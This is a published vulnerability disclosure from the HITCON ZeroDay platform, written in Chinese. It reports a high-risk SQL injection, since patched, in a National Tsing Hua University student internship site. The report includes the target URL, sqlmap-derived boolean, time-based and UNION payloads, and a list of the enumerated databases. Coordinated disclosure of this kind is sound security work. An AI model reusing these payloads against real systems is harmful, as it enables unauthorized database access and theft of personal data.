國立清華大學電機資訊學院 - 學生暑期實習,發現 SQL-Injection 漏洞。 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00291
  •  發信 Vendor: 國立清華大學
  • Title: 國立清華大學電機資訊學院 - 學生暑期實習,發現 SQL-Injection 漏洞。
  • Introduction: SQL-Injection

處理狀態

目前狀態

公開
Last Update : 2019/04/20
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2019/03/31 06:38:37 : 新提交 (由 MksYi 更新此狀態)
  • 2019/03/31 20:33:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/04/01 16:55:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/04/01 16:55:07 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/04/15 10:29:30 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2019/04/16 03:35:40 : 確認已修補 (由 MksYi 更新此狀態)
  • 2019/04/20 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00291
  • 通報者:MksYi (MksYi)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://intern.ee.nthu.edu.tw/showAnnounceDetail.php?id=1

敘述

Google Hacking 發現此站。

  1. 使用發現參數 ID 加上單引號,文章資訊會空白。

  2. 使用 sqlmap 掃描得到以下結果。

    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7422=7422
    
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)
    
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-3630 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171626271,0x53534e574c487a7a6e564f4c4f4d6d516a774151546b61744a77584c445455727371695352765848,0x7162786a71)-- SxgR
    ---
  3. 獲得資料庫列表

    available databases [24]:
    [*] alumni
    [*] booking
    [*] eecamp
    [*] exchangestu
    [*] gallery2_alumni
    [*] gallery2_alumni_backup
    [*] gallery2_implement
    [*] hc
    [*] highschool
    [*] honor
    [*] honor_development
    [*] honordev
    [*] implement
    [*] implement_prof
    [*] information_schema
    [*] limesurvey
    [*] limesurvey_2
    [*] master
    [*] md2
    [*] mysql
    [*] pfn
    [*] Screeningtest
    [*] sumtraining
    [*] test

    圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;